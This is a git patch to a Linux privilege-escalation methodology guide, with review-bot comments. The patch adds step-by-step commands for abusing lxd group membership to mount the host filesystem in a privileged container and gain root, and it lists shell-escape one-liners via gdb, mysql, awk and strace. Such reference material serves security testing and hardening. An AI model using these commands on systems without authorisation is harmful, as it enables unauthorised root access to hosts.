From b22fd268003a66a526efd395f2d20dda120c4e58 Mon Sep 17 00:00:00 2001 From: Swissky Date: Thu, 7 Mar 2019 15:27:54 +0100 Subject: [PATCH] Linux PrivEsc - LXD Group --- .../Linux - Privilege Escalation.md | 38 +++++++++++++++++-- 1 file changed, 35 insertions(+), 3 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 951844d4..71b58497 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -29,6 +29,7 @@ * [Wildcard](#wildcard) * [Groups](#groups) * [Docker](#docker) + * [LXC/LXD](#lxc-lxd) ## Checklists @@ -157,7 +158,7 @@ sudo chmod +s /tmp/suid # setuid bit ### List capabilities of binaries ```bash -╭─swissky@crashmanjaro ~ +╭─swissky@lab ~ ╰─$ /usr/bin/getcap -r /usr/bin /usr/bin/fping = cap_net_raw+ep /usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip @@ -253,7 +254,7 @@ The project collects legitimate functions of Unix binaries that can be abused to > gdb -nx -ex '!sh' -ex quit > sudo mysql -e '\! /bin/sh' -> strace -o /dev/null /bin/sh +> strace -o /dev/null /bin/sh > sudo awk 'BEGIN {system("/bin/sh")}' 
@@ -325,6 +326,36 @@ sh-5.0# id uid=0(root) gid=0(root) groups=0(root) ``` +### LXC/LXD + +The privesc requires to run a container with elevated privileges and mount the host filesystem inside. + +```powershell +╭─swissky@lab ~ +╰─$ id +uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel) +``` + +Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. + +```powershell +# build a simple alpine image +git clone https://github.com/saghul/lxd-alpine-builder +./build-alpine -a i686 + +# import the image +lxc image import ./alpine.tar.gz --alias myimage + +# run the image +lxc init myimage mycontainer -c security.privileged=true + +# mount the /root into the image +lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true + +# interact with the container +lxc start mycontainer +lxc exec mycontainer /bin/sh +``` ## References @@ -335,4 +366,5 @@ uid=0(root) gid=0(root) groups=0(root) - [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) - [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/) - [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) -- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) \ No newline at end of file +- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) +- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) \ No newline at end of file
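Review bot: In the table-of-contents hunk (`@@ -29,6 +29,7 @@`), the new entry `[LXC/LXD](#lxc-lxd)` will not resolve to the heading this patch adds. GitHub's renderer drops the slash when it builds the anchor for `### LXC/LXD`, which gives `#lxclxd`. Change the link target to `#lxclxd`, or rename the heading so that its generated anchor matches the link.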
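Review bot: In the GTFOBins hunk (`@@ -253,7 +254,7 @@`), the removed and added `> strace -o /dev/null /bin/sh` lines read identically, so this looks like a whitespace-only change unrelated to the "LXD Group" subject. Drop it from this patch or put it in a separate cleanup commit so that the history of the LXD section stays easy to follow.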
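Review bot: In the new `### LXC/LXD` section (`@@ -325,6 +326,36 @@`), the comment `# mount the /root into the image` does not match the command under it, which uses `source=/ path=/mnt/root` and therefore exposes the host's entire root filesystem inside the container, not only `/root`. Reword the comment to say that. Both fences are also tagged `powershell` although they contain a Linux shell session; the file's existing blocks use `bash`. The opening sentence never states the precondition that the `id` output is meant to show, namely membership in the `lxd` group (`110(lxd)`). Say so explicitly and fix the grammar of "requires to run". A closing line for defenders would help as well: membership in `lxd` is root-equivalent on the host, so it should be granted and audited like `sudo` access.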
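Review bot: In the references hunk (`@@ -335,4 +366,5 @@`), the new last line still carries `\ No newline at end of file`, so the next reference appended will again show the previous entry as modified, as happens here with the NFS link. End the file with a newline after the `@reboare` entry.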